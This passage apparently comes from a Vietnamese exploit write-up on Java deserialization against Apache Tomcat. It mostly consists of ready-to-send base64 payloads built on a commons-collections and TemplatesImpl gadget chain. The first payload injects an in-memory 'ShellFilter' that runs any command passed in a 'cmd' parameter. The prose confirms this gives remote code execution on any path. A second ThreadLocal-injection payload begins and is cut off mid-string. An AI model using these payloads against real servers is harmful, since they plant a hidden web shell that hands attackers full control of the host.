rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAGuDK%2Frq%2BAAAANAE%2FCgBRALUHALYIALcKAD4AuAoAuQC6CgC5ALsHALwKAAcAvQcAvgsACQC%2FCACDCwAJAMAIAMELAMIAwwsAwgDECgDFAMYKAMUAxwoAyADJBwDKCgATAMsIAMwKABMAzQoAEwDOCgATAM8IANAKABMA0QoA0gDTCgDSANQKANIA0QcA1QoAHgDWBwDXCgAgANYLANgA2QoAKAC%2FCgBCANoIANsHANwHAN0HAN4KACgAtQgA3wcA4AoAKwC1CgArAOEKACsA4goAPgDjCgArAOQKACcA5QcA5goAMgC1CADnCgAyAOgKADIA4gkA6QDqCgDpAOsKADIA7AoAJwDtCAChBwDuBwDvBwDwBwDxCgA%2BAPIKAPMAugcA9AoA8wD1CwA8APYHAPcKAEUA1gcA%2BAoARwDWBwD5CgBJANYHAPoKAEsA1gcA%2BwoATQDWBwD8CgBPANYHAP0HAP4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAFExUb21jYXRGaWx0ZXJJbmplY3Q7AQARZ2V0U2VydmxldENvbnRleHQBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAYbGFzdFNlcnZpY2VkUmVxdWVzdEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAC3RocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAA1TdGFja01hcFRhYmxlBwD%2FBwC8AQAKRXhjZXB0aW9ucwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAQABAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACGRvRmlsdGVyAQBbKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjspVgEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAHc2Nhbm5lcgEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQABbgEAIExqYXZhL2xhbmcvTnVsbFBvaW50ZXJFeGNlcHRpb247AQAHcmVxdWVzdAEACHJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQADY21kAQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7BwDeBwC%2BBwEBBwECBwEDBwEEBwEFBwDKBwDVBwDXBwEGAQAIPGNsaW5pdD4BAA5zZXJ2bGV0Q29udGV4dAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEAD2FwcENvbnRleHRGaWVsZAEAEmFwcGxpY2F0aW9uQ29udGV4dAEALUxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25Db250ZXh0OwEAFHN0YW5kYXJkQ29udGV4dEZpZWxkAQAPc3RhbmRhcmRDb250ZXh0AQAqTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQ7AQAGZmlsdGVyAQAEbmFtZQEACWZpbHRlckRlZgEAMUxvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjsBAAlmaWx0ZXJNYXABADFMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7AQAHQ29uZmlncwEADWZpbHRlckNvbmZpZ3MBAA9MamF2YS91dGlsL01hcDsBAAtjb25zdHJ1Y3RvcgEAH0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAAxmaWx0ZXJDb25maWcBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOwEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uOwEAIkxqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbjsBAC1MamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbjsBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0luc3RhbnRpYXRpb25FeGNlcHRpb247BwD3BwD4BwD5BwD6BwD7BwD8AQAKU291cmNlRmlsZQEAF1RvbWNhdEZpbHRlckluamVjdC5qYXZhDABTAFQBAC9vcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDaGFpbgEAE2xhc3RTZXJ2aWNlZFJlcXVlc3QMAQcBCAcA%2FwwBCQEKDAELAQwBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAQsBDQEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QMAFoAWwwBDgEPAQAYdGV4dC9odG1sOyBjaGFyc2V0PVVURi04BwEBDAEQAREMARIBEwcBFAwBFQEWDAEXARgHARkMARoBGwEAEWphdmEvdXRpbC9TY2FubmVyDABTARwBAAJcQQwBHQEeDAEfASAMASEBIgEAAAwBIwBUBwEEDAEkAREMASUAVAEAE2phdmEvaW8vSU9FeGNlcHRpb24MASYAVAEAHmphdmEvbGFuZy9OdWxsUG9pbnRlckV4Y2VwdGlvbgcBAgwAcgEnDAEoASkBAAdjb250ZXh0AQArb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uQ29udGV4dAEAKG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQBABJUb21jYXRGaWx0ZXJJbmplY3QBAAtTaGVsbEZpbHRlcgEAL29yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyRGVmDAEqASsMASwBEQwBLQEiDAEuAREMAS8BMAEAL29yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyTWFwAQACLyoMATEBEQcBMgwBMwE0DACbASIMATUBEQwBNgE3AQANamF2YS91dGlsL01hcAEAMG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9BcHBsaWNhdGlvbkZpbHRlckNvbmZpZwEAD2phdmEvbGFuZy9DbGFzcwEAG29yZy9hcGFjaGUvY2F0YWxpbmEvQ29udGV4dAwBOAE5BwE6AQAQamF2YS9sYW5nL09iamVjdAwBOwE8DAE9AT4BAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24BACBqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BACBqYXZhL2xhbmcvSW5zdGFudGlhdGlvbkV4Y2VwdGlvbgEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBABlqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluAQAQamF2YS9sYW5nL1N0cmluZwEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAOc2V0Q29udGVudFR5cGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xvc2UBAAV3cml0ZQEABWZsdXNoAQAPcHJpbnRTdGFja1RyYWNlAQBAKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTspVgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEACXNldEZpbHRlcgEAGShMamF2YXgvc2VydmxldC9GaWx0ZXI7KVYBAA1zZXRGaWx0ZXJOYW1lAQAHZ2V0TmFtZQEADnNldEZpbHRlckNsYXNzAQAMYWRkRmlsdGVyRGVmAQA0KExvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjspVgEADWFkZFVSTFBhdHRlcm4BABxqYXZheC9zZXJ2bGV0L0Rpc3BhdGNoZXJUeXBlAQAHUkVRVUVTVAEAHkxqYXZheC9zZXJ2bGV0L0Rpc3BhdGNoZXJUeXBlOwEADXNldERpc3BhdGNoZXIBABJhZGRGaWx0ZXJNYXBCZWZvcmUBADQoTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyTWFwOylWAQAWZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcgEAMyhbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yAQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANwdXQBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwAhACgAUQABAFIAAAAGAAEAUwBUAAEAVQAAAC8AAQABAAAABSq3AAGxAAAAAgBWAAAABgABAAAAEwBXAAAADAABAAAABQBYAFkAAAAJAFoAWwACAFUAAACZAAIAAwAAADISAhIDtgAESyoEtgAFKgG2AAbAAAdMK8YAGSu2AAjGABIrtgAIwAAJTSy5AAoBALABsAAAAAMAVgAAAB4ABwAAAEcACABIAA0ASQAWAEoAIQBLACkATAAwAE4AVwAAACAAAwApAAcAXABdAAIACAAqAF4AXwAAABYAHABgAGEAAQBiAAAACwAB%2FQAwBwBjBwBkAGUAAAAIAAMARwBFAEkAAQBmAGcAAgBVAAAAPwAAAAMAAAABsQAAAAIAVgAAAAYAAQAAAFQAVwAAACAAAwAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBqAGsAAgBlAAAABAABAGwAAQBmAG0AAgBVAAAASQAAAAQAAAABsQAAAAIAVgAAAAYAAQAAAFkAVwAAACoABAAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBuAG8AAgAAAAEAcABxAAMAZQAAAAQAAQBsAAEAcgBzAAIAVQAAAbUAAwAJAAAAgysSC7kADAIAOgQsEg25AA4CACy5AA8BADoFGQTGAF64ABAZBLYAEbYAEjoGuwATWRkGtwAUEhW2ABY6BxkHtgAXmQALGQe2ABinAAUSGToIGQe2ABoZBRkItgAbGQW2ABwZBbYAHacAFDoGGQa2AB%2BnAAo6BhkGtgAhLSssuQAiAwCxAAIAHwBmAGkAHgAfAGYAcwAgAAMAVgAAAE4AEwAAAFwACgBdABIAXgAaAF8AHwBhACwAYwA8AGQAUABlAFUAZgBcAGcAYQBoAGYAbQBpAGkAawBqAHAAbQBzAGsAdQBsAHoAbwCCAHAAVwAAAHAACwAsADoAdAB1AAYAPAAqAHYAdwAHAFAAFgB4AHkACABrAAUAegB7AAYAdQAFAHwAfQAGAAAAgwBYAFkAAAAAAIMAfgBdAAEAAACDAH8AgAACAAAAgwCBAIIAAwAKAHkAgwB5AAQAGgBpAIQAhQAFAGIAAABGAAX%2FAEwACAcAhgcAhwcAiAcAiQcAigcAiwcAjAcAjQAAQQcAiv8AGgAGBwCGBwCHBwCIBwCJBwCKBwCLAAEHAI5JBwCPBgBlAAAABgACAB4AkAAIAJEAVAABAFUAAAMFAAUADQAAASS4ACNLKrYAJBIltgAETCsEtgAFKyq2AAbAACZNLLYAJBIltgAETi0EtgAFLSy2AAbAACc6BLsAKFm3ACk6BRIqOga7ACtZtwAsOgcZBxkFtgAtGQcZBrYALhkHGQW2ACS2AC%2B2ADAZBBkHtgAxuwAyWbcAMzoIGQgSNLYANRkIGQa2ADYZCLIAN7YAOLYAORkEGQi2ADoZBLYAJBI7tgAEOgkZCQS2AAUZCRkEtgAGwAA8OgoSPQW9AD5ZAxI%2FU1kEEitTtgBAOgsZCwS2AEEZCwW9AEJZAxkEU1kEGQdTtgBDwAA9OgwZChkGGQy5AEQDAFenADBLKrYARqcAKEsqtgBIpwAgSyq2AEqnABhLKrYATKcAEEsqtgBOpwAISyq2AFCxAAYAAADzAPYARQAAAPMA%2FgBHAAAA8wEGAEkAAADzAQ4ASwAAAPMBFgBNAAAA8wEeAE8AAwBWAAAAtgAtAAAAFwAEABgADgAZABMAGgAcABsAJgAcACsAHQA1AB8APgAgAEIAIQBLACIAUgAjAFkAJABmACUAbQAnAHYAKAB9ACkAhAAqAI8AKwCWAC0AogAuAKgALwC0ADEAyQAyAM8AMwDnADQA8wBCAPYANgD3ADcA%2BwBCAP4AOAD%2FADkBAwBCAQYAOgEHADsBCwBCAQ4APAEPAD0BEwBCARYAPgEXAD8BGwBCAR4AQAEfAEEBIwBDAFcAAADAABMABADvAJIAkwAAAA4A5QCUAF8AAQAcANcAlQCWAAIAJgDNAJcAXwADADUAvgCYAJkABAA%2BALUAmgBZAAUAQgCxAJsAeQAGAEsAqACcAJ0ABwB2AH0AngCfAAgAogBRAKAAXwAJALQAPwChAKIACgDJACoAowCkAAsA5wAMAKUApgAMAPcABAB6AKcAAAD%2FAAQAegCoAAABBwAEAHoAqQAAAQ8ABAB6AKoAAAEXAAQAegCrAAABHwAEAHoArAAAAGIAAAAdAAf3APYHAK1HBwCuRwcAr0cHALBHBwCxRwcAsgQAAQCzAAAAAgC0cHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D

Trước khi inject:

Danh sách Filters chỉ có 1 Filter mặc định

Tiến hành inject:

Sau khi inject:

Danh sách filter đã có thêm ShellFilter do ta inject

Lúc này chỉ cần truy cập bất ký path nào với param cmd để RCE

C. Tóm tắt cách khai thác

Gửi payload deser để inject ThreadLocal

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAC%2BDK%2Frq%2BAAAANACECgAfAEcIAEgKAEkASggASwoASQBMBwBNCABOCABPBwBQCABRCgAJAFIKAAkAUwcAVAoACQBVCgAJAFYKAAkAVwoACQBYBwBZCgASAEcKAAkAWgoAEgBbBwBcCwAWAF0IAF4KAF8AYAoAXwBhCgBfAGIHAGMKABwAZAcAZQcAZgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATTFRocmVhZExvY2FsSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwBnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAC3RocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAWV1JBUF9TQU1FX09CSkVDVF9GSUVMRAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABhsYXN0U2VydmljZWRSZXF1ZXN0RmllbGQBABlsYXN0U2VydmljZWRSZXNwb25zZUZpZWxkAQAObW9kaWZpZXJzRmllbGQBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAUAcAYwEAClNvdXJjZUZpbGUBABZUaHJlYWRMb2NhbEluamVjdC5qYXZhDAAgACEBAC5vcmcuYXBhY2hlLmNhdGFsaW5hLmNvcmUuQXBwbGljYXRpb25EaXNwYXRjaGVyBwBoDABpAGoBABBXUkFQX1NBTUVfT0JKRUNUDABrAGwBAC9vcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDaGFpbgEAE2xhc3RTZXJ2aWNlZFJlcXVlc3QBABRsYXN0U2VydmljZWRSZXNwb25zZQEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAJbW9kaWZpZXJzDABtAG4MAG8AcAEAGmphdmEvbGFuZy9yZWZsZWN0L01vZGlmaWVyDABxAHIMAHMAdAwAdQB2DAB3AHgBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAHkAegwAdwB7AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UMAHwAfQEAIEluamVjdCBUaHJlYWRMb2NhbCBTdWNjZXNzZnVsbHkhBwB%2BDAB%2FAIAMAIEAIQwAggAhAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAgwAhAQARVGhyZWFkTG9jYWxJbmplY3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAPamF2YS9sYW5nL0NsYXNzAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAxnZXRNb2RpZmllcnMBAAMoKUkBAAZzZXRJbnQBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAKZ2V0Qm9vbGVhbgEAFShMamF2YS9sYW5nL09iamVjdDspWgEACnNldEJvb2xlYW4BABYoTGphdmEvbGFuZy9PYmplY3Q7WilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANzZXQBACco